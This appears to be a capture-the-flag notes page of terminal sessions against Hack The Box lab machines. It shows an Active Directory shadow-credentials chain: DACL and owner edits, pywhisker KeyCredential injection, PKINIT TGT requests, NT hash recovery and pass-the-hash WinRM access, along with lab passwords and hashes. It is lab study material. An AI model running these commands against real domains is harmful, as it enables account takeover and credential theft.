pywhisker / gettgtpkinit.py / getnthash.py
pywhisker installed with: pipx instal pywhisker
┌──(bolke㉿bolke)-[~/htb/outdated]
└─$ pipx list
venvs are in /home/bolke/.local/share/pipx/venvs
apps are exposed on your $PATH at /home/bolke/.local/bin
manual pages are exposed at /home/bolke/.local/share/man
package certipy-ad 5.0.2, installed using Python 3.13.2
– certipy
package donpapi 2.1.0, installed using Python 3.13.2
– DonPAPI
– donpapi
– dpp
package impacket 0.13.0.dev0+20250415.195618.c384b5fb, installed using Python 3.13.2
– DumpNTLMInfo.py
–snip–
package pywhisker 0.1.2, installed using Python 3.13.2
– pywhisker
certified.htb
non virtualized setup : working o.k.
┌──(bolke㉿kali)-[~]
└─$ git clone https://github.com/dirkjanm/PKINITtools
Cloning into 'PKINITtools'...
remote: Enumerating objects: 45, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 45 (delta 14), reused 10 (delta 10), pack-reused 27 (from 1)
Receiving objects: 100% (45/45), 28.08 KiB | 927.00 KiB/s, done.
Resolving deltas: 100% (21/21), done.
┌──(bolke㉿kali)-[~]
└─$ cd PKINITtools
└─$ ls
getnthash.py gettgtpkinit.py ntlmrelayx requirements.txt
gets4uticket.py LICENSE README.md
cp gettgtpkinit.py /home/bolke/.local/bin
cp getnthash.py /home/bolke/.local/bin
cp gets4uticket.py /home/bolke/.local/bin
┌──(bolke㉿kali)-[~/.local/bin]
└─$ chmod +x pywhisker.py
└─$ chmod +x getnthash.py
┌──(bolke㉿kali)-[~/.local/bin]
└─$ ls -la
total 144
drwxr-xr-x 2 bolke bolke 4096 Jan 28 21:47 .
drwxr-xr-x 5 bolke bolke 4096 Apr 18 2025 ..
lrwxrwxrwx 1 bolke bolke 58 Jan 15 12:59 certipy -> /home/bolke/.local/share/pipx/venvs/certipy-ad/bin/certipy
lrwxrwxrwx 1 bolke bolke 55 Jan 15 12:19 donpapi -> /home/bolke/.local/share/pipx/venvs/donpapi/bin/donpapi
lrwxrwxrwx 1 bolke bolke 55 Jan 15 12:19 DonPAPI -> /home/bolke/.local/share/pipx/venvs/donpapi/bin/DonPAPI
lrwxrwxrwx 1 bolke bolke 51 Jan 15 12:19 dpp -> /home/bolke/.local/share/pipx/venvs/donpapi/bin/dpp
-rwxrwxr-x 1 bolke bolke 12639 Jan 28 21:46 getnthash.py
-rwxrwxr-x 1 bolke bolke 8560 Jan 28 21:47 gets4uticket.py
-rwxrwxr-x 1 bolke bolke 14826 Jan 28 21:24 gettgtpkinit.py
lrwxrwxrwx 1 bolke bolke 55 May 1 2025 netexec -> /home/bolke/.local/share/pipx/venvs/netexec/bin/netexec
lrwxrwxrwx 1 bolke bolke 55 May 1 2025 NetExec -> /home/bolke/.local/share/pipx/venvs/netexec/bin/NetExec
lrwxrwxrwx 1 bolke bolke 51 May 1 2025 nxc -> /home/bolke/.local/share/pipx/venvs/netexec/bin/nxc
lrwxrwxrwx 1 bolke bolke 53 May 1 2025 nxcdb -> /home/bolke/.local/share/pipx/venvs/netexec/bin/nxcdb
lrwxrwxrwx 1 bolke bolke 59 Apr 20 2025 powerview -> /home/bolke/.local/share/pipx/venvs/powerview/bin/powerview
lrwxrwxrwx 1 bolke bolke 64 Jan 15 15:12 pygpoabuse.py -> /home/bolke/.local/share/pipx/venvs/pygpoabuse/bin/pygpoabuse.py
-rwxrwxr-x 1 bolke bolke 51894 Jan 28 08:20 pywhisker.py
-rwxrwxr-x 1 bolke bolke 33921 Jan 28 11:34 targetedKerberoast.py
┌──(bolke㉿kali)-[~/.local/bin]
└─$
.
┌──(bolke㉿kali)-[~/htb/certified]
└─$ impacket-owneredit -action write -new-owner judith.mader -target management certified/judith.mader:judith09 -dc-ip 10.129.231.186
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-729746778-2675978091-3820388244-1103
[*] - sAMAccountName: judith.mader
[*] - distinguishedName: CN=Judith Mader,CN=Users,DC=certified,DC=htb
[*] OwnerSid modified successfully!
┌──(bolke㉿kali)-[~/htb/certified]
└─$ impacket-dacledit -action 'write' -rights 'WriteMembers' -principal judith.mader -target Management 'certified'/'judith.mader':'judith09' -dc-ip 10.129.231.186
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20260128-215512.bak
[*] DACL modified successfully!
┌──(bolke㉿kali)-[~/htb/certified]
└─$ net rpc group members Management -U "certified.htb"/"judith.mader"%"judith09" -S 10.129.231.186
CERTIFIED\management_svc
┌──(bolke㉿kali)-[~/htb/certified]
└─$ net rpc group addmem Management judith.mader -U "certified.htb"/"judith.mader"%"judith09" -S 10.129.231.186
┌──(bolke㉿kali)-[~/htb/certified]
└─$ net rpc group members Management -U "certified.htb"/"judith.mader"%"judith09" -S 10.129.231.186
CERTIFIED\judith.mader
CERTIFIED\management_svc
┌──(bolke㉿kali)-[~/htb/certified]
└─$ pywhisker.py -d "certified.htb" -u "judith.mader" -p 'judith09' --target "management_svc" --action "add"
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 32cab244-1d15-5a55-2253-56161dbd349f
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: PgrqhjdT.pfx
/home/bolke/.local/bin/pywhisker.py:54: CryptographyDeprecationWarning: Parsed a serial number which wasn't positive (i.e., it was negative or zero), which is disallowed by RFC 5280. Loading this certificate will cause an exception in a future release of cryptography.
cert_obj = x509.load_pem_x509_certificate(pem_cert_data, default_backend())
[+] PFX exportiert nach: PgrqhjdT.pfx
[i] Passwort für PFX: cZMAGxnXSW9K6rFaZHaX
[+] Saved PFX (#PKCS12) certificate & key at path: PgrqhjdT.pfx
[*] Must be used with password: cZMAGxnXSW9K6rFaZHaX
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
┌──(bolke㉿kali)-[~/htb/certified]
└─$ pywhisker.py -d "certified.htb" -u "judith.mader" -p 'judith09' --target "management_svc" --action "list"
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Listing devices for management_svc
[*] DeviceID: ca3d4f28-6c56-0511-8a60-19809c7aebf0 | Creation Time (UTC): 2026-01-28 20:19:51.682871
[*] DeviceID: 32cab244-1d15-5a55-2253-56161dbd349f | Creation Time (UTC): 2026-01-28 20:56:40.064964
┌──(bolke㉿kali)-[~/htb/certified]
└─$ gettgtpkinit.py certified.htb/management_svc -cert-pfx PgrqhjdT.pfx -pfx-pass 'cZMAGxnXSW9K6rFaZHaX' management_svc.ccache
2026-01-28 21:58:04,719 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2026-01-28 21:58:04,753 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2026-01-28 21:58:18,812 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2026-01-28 21:58:18,813 minikerberos INFO 71eee1ac2304c1759518b51ed01b7c316a2cacb996d238cd877a8dd5f7f9a18c
INFO:minikerberos:71eee1ac2304c1759518b51ed01b7c316a2cacb996d238cd877a8dd5f7f9a18c
2026-01-28 21:58:18,816 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
┌──(bolke㉿kali)-[~/htb/certified]
└─$ ls
20260128184026_bloodhound.zip dacledit-20260128-190717.bak management_svc.ccache PgrqhjdT.pfx WFrW3lxq.pfx
administrator.pfx dacledit-20260128-211343.bak management_svc.hash PgrqhjdT_priv.pem WFrW3lxq_priv.pem
dacledit-20260128-184359.bak dacledit-20260128-215512.bak PgrqhjdT_cert.pem WFrW3lxq_cert.pem
┌──(bolke㉿kali)-[~/htb/certified]
└─$ getnthash.py certified.htb/management_svc -key 71eee1ac2304c1759518b51ed01b7c316a2cacb996d238cd877a8dd5f7f9a18c
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a091c1832bcdd4677c28b5a6a1295584
┌──(bolke㉿kali)-[~/htb/certified]
└─$ nxc winrm certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584
WINRM 10.129.231.186 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certified.htb)
WINRM 10.129.231.186 5985 DC01 [+] certified.htb\management_svc:a091c1832bcdd4677c28b5a6a1295584 (Pwn3d!)
┌──(bolke㉿kali)-[~/htb/certified]
.
same way shadow credentials using pywhisker for ca_operator
┌──(bolke㉿kali)-[~/htb/certified]
└─$ nxc winrm certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584
┌──(bolke㉿kali)-[~/htb/certified]
└─$ nxc winrm certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584
WINRM 10.129.100.248 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certified.htb)
WINRM 10.129.100.248 5985 DC01 [+] certified.htb\management_svc:a091c1832bcdd4677c28b5a6a1295584 (Pwn3d!)
┌──(bolke㉿kali)-[~/htb/certified]
└─$ pywhisker.py -d "certified.htb" -u "management_svc" -H 'a091c1832bcdd4677c28b5a6a1295584' --target "ca_operator" --action "add"
[*] Searching for the target account
[*] Target user found: CN=operator ca,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 6c10e0f7-5a56-ba5b-b7e1-0c3fe18aaf34
[*] Updating the msDS-KeyCredentialLink attribute of ca_operator
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: PrObxa8J.pfx
/home/bolke/.local/bin/pywhisker.py:54: CryptographyDeprecationWarning: Parsed a serial number which wasn't positive (i.e., it was negative or zero), which is disallowed by RFC 5280. Loading this certificate will cause an exception in a future release of cryptography.
cert_obj = x509.load_pem_x509_certificate(pem_cert_data, default_backend())
[+] PFX exportiert nach: PrObxa8J.pfx
[i] Passwort für PFX: 0Fb09CdNNaCabbZ9WIka
[+] Saved PFX (#PKCS12) certificate & key at path: PrObxa8J.pfx
[*] Must be used with password: 0Fb09CdNNaCabbZ9WIka
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
┌──(bolke㉿kali)-[~/htb/certified]
└─$ gettgtpkinit.py -cert-pfx PrObxa8J.pfx certified.htb/ca_operator -pfx-pass '0Fb09CdNNaCabbZ9WIka' ca_operator.ccache
2026-01-28 22:34:50,176 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2026-01-28 22:34:50,211 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2026-01-28 22:34:57,653 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2026-01-28 22:34:57,653 minikerberos INFO 5c9007500b27c5db59e955814eb9bc467cbd6a1160341b93dfe4036fbfe4cc37
INFO:minikerberos:5c9007500b27c5db59e955814eb9bc467cbd6a1160341b93dfe4036fbfe4cc37
2026-01-28 22:34:57,656 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
┌──(bolke㉿kali)-[~/htb/certified]
└─$ export KRB5CCNAME=ca_operator.ccache
┌──(bolke㉿kali)-[~/htb/certified]
└─$ getnthash.py -key 5c9007500b27c5db59e955814eb9bc467cbd6a1160341b93dfe4036fbfe4cc37 certified.htb/ca_operator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
b4b86f45c6018f1b664f70805f45d8f2
┌──(bolke㉿kali)-[~/htb/certified]
└─$ nxc smb certified.htb -u ca_operator -H b4b86f45c6018f1b664f70805f45d8f2
SMB 10.129.100.248 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.100.248 445 DC01 [+] certified.htb\ca_operator:b4b86f45c6018f1b664f70805f45d8f2
┌──(bolke㉿kali)-[~/htb/certified]
└─$
.
┌──(bolke㉿bolke)-[~/htb/outdated]
└─$ pywhisker –action list -d outdated.htb -u btables -p 5myBPLPDKT3Bfq –dc-ip 10.10.11.175 -t sflowers –use-ldaps
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute
┌──(bolke㉿bolke)-[~/htb/outdated]
└─$ pywhisker –action add -d outdated.htb -u btables -p 5myBPLPDKT3Bfq –dc-ip 10.10.11.175 -t sflowers –use-ldaps
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 4f2cd3e5-b6c1-3a74-b0b6-b852cd703b5c
[*] Updating the msDS-KeyCredentialLink attribute of sflowers
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: tFxD90ok.pfx
[*] Must be used with password: pSDHrW2Yha3Gy80yHFXj
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
┌──(bolke㉿bolke)-[~/htb/outdated]
└─$ git clone https://github.com/dirkjanm/PKINITtools.git
Cloning into ‘PKINITtools’…
remote: Enumerating objects: 45, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 45 (delta 14), reused 10 (delta 10), pack-reused 27 (from 1)
Receiving objects: 100% (45/45), 28.08 KiB | 1.65 MiB/s, done.
Resolving deltas: 100% (21/21), done.
┌──(bolke㉿bolke)-[~/htb/outdated]
└─$ cd PKINITtools
┌──(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ python gettgtpkinit.py -cert-pfx ../tFxD90ok.pfx -pfx-pass pSDHrW2Yha3Gy80yHFXj outdated.htb/sflowers sflowers.ccache -dc-ip 10.10.11.175
2025-06-09 16:27:33,183 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
zsh: segmentation fault python gettgtpkinit.py -cert-pfx ../tFxD90ok.pfx -pfx-pass sflowers.ccache
┌──(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ virtualenv venv
created virtual environment CPython3.13.2.final.0-64 in 193ms
creator CPython3Posix(dest=/home/bolke/htb/outdated/PKINITtools/venv, clear=False, no_vcs_ignore=False, global=False)
seeder FromAppData(download=False, pip=bundle, via=copy, app_data_dir=/home/bolke/.local/share/virtualenv)
added seed packages: pip==25.0.1
activators BashActivator,CShellActivator,FishActivator,NushellActivator,PowerShellActivator,PythonActivator
┌──(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ source venv/bin/activate
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ pip install minikerberos
Collecting minikerberos
Using cached minikerberos-0.4.6-py3-none-any.whl.metadata (734 bytes)
Collecting asn1crypto>=1.5.1 (from minikerberos)
Using cached asn1crypto-1.5.1-py2.py3-none-any.whl.metadata (13 kB)
–snip–
Using cached pycparser-2.22-py3-none-any.whl (117 kB)
Installing collected packages: asn1crypto, tqdm, six, pycryptodomex, pycparser, oscrypto, h11, unicrypto, cffi, cryptography, asysocks, minikerberos
Successfully installed asn1crypto-1.5.1 asysocks-0.2.13 cffi-1.17.1 cryptography-45.0.3 h11-0.16.0 minikerberos-0.4.6 oscrypto-1.3.0 pycparser-2.22 pycryptodomex-3.23.0 six-1.17.0 tqdm-4.67.1 unicrypto-0.0.10
if timer error : minikerberos.protocol.errors.KerberosError: Error Name: KRB_AP_ERR_SKEW Detail: “The clock skew is too great”
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ sudo ntpdate outdated.htb
2025-06-10 00:30:55.216907 (+0200) +28799.608686 +/- 0.015638 outdated.htb 10.10.11.175 s1 no-leap
CLOCK: time stepped by 28799.608686
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ python gettgtpkinit.py -cert-pfx ../tFxD90ok.pfx -pfx-pass pSDHrW2Yha3Gy80yHFXj outdated.htb/sflowers sflowers.ccache -dc-ip 10.10.11.175
2025-06-10 00:31:09,795 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-06-10 00:31:09,815 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-06-10 00:31:19,261 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-06-10 00:31:19,261 minikerberos INFO 43e105de2c74d5fa799f9c9822bb30a84e914bad1161b87413630b7b1fb7accf
INFO:minikerberos:43e105de2c74d5fa799f9c9822bb30a84e914bad1161b87413630b7b1fb7accf
2025-06-10 00:31:19,271 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ pip list
Package Version
————- ——-
asn1crypto 1.5.1
asysocks 0.2.13
cffi 1.17.1
cryptography 45.0.3
h11 0.16.0
minikerberos 0.4.6
oscrypto 1.3.0
pip 25.0.1
pycparser 2.22
pycryptodomex 3.23.0
six 1.17.0
tqdm 4.67.1
unicrypto 0.0.10
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ ls
getnthash.py gets4uticket.py gettgtpkinit.py LICENSE ntlmrelayx README.md requirements.txt sflowers.ccache venv
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ export KRB5CCNAME=sflowers.ccache
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ klist
Ticket cache: FILE:sflowers.ccache
Default principal: sflowers@OUTDATED.HTB
Valid starting Expires Service principal
06/10/2025 00:31:19 06/10/2025 10:31:19 krbtgt/OUTDATED.HTB@OUTDATED.HTB
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ python getnthash.py outdated.htb/sflowers -key 43e105de2c74d5fa799f9c9822bb30a84e914bad1161b87413630b7b1fb7accf
Traceback (most recent call last):
File “/home/bolke/htb/outdated/PKINITtools/getnthash.py”, line 33, in <module>
from pyasn1.type.univ import noValue, SequenceOf, Integer
ModuleNotFoundError: No module named ‘pyasn1’
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ ls
getnthash.py gets4uticket.py gettgtpkinit.py LICENSE ntlmrelayx README.md requirements.txt sflowers.ccache venv
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ pip install -r requirements.txt
Collecting impacket (from -r requirements.txt (line 1))
Using cached impacket-0.12.0-py3-none-any.whl
Requirement already satisfied: minikerberos in ./venv/lib/python3.13/site-packages (from -r requirements.txt (line 2)) (0.4.6)
Collecting pyasn1>=0.2.3 (from impacket->-r requirements.txt (line 1))
Using cached pyasn1-0.6.1-py3-none-any.whl.metadata (8.4 kB)
Collecting pyasn1_modules (from impacket->-r requirements.txt (line 1))
Using cached pyasn1_modules-0.4.2-py3-none-any.whl.metadata (3.5 kB)
Requirement already satisfied: pycryptodomex in ./venv/lib/python3.13/site-packages (from impacket->-r requirements.txt (line 1)) (3.23.0)
–snip–
Using cached MarkupSafe-3.0.2-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (23 kB)
Using cached werkzeug-3.1.3-py3-none-any.whl (224 kB)
Using cached dnspython-2.7.0-py3-none-any.whl (313 kB)
Installing collected packages: setuptools, pyasn1, markupsafe, itsdangerous, dnspython, click, charset_normalizer, blinker, werkzeug, pyasn1_modules, ldap3, jinja2, cryptography, pyOpenSSL, ldapdomaindump, flask, impacket
Attempting uninstall: cryptography
Found existing installation: cryptography 45.0.3
Uninstalling cryptography-45.0.3:
Successfully uninstalled cryptography-45.0.3
Successfully installed blinker-1.9.0 charset_normalizer-3.4.2 click-8.2.1 cryptography-42.0.8 dnspython-2.7.0 flask-3.1.1 impacket-0.12.0 itsdangerous-2.2.0 jinja2-3.1.6 ldap3-2.9.1 ldapdomaindump-0.10.0 markupsafe-3.0.2 pyOpenSSL-24.0.0 pyasn1-0.6.1 pyasn1_modules-0.4.2 setuptools-80.9.0 werkzeug-3.1.3
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ python getnthash.py outdated.htb/sflowers -key 43e105de2c74d5fa799f9c9822bb30a84e914bad1161b87413630b7b1fb7accf
/home/bolke/htb/outdated/PKINITtools/venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 – Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
1fcdb1f6015dcb318cc77bb2bda14db5
References used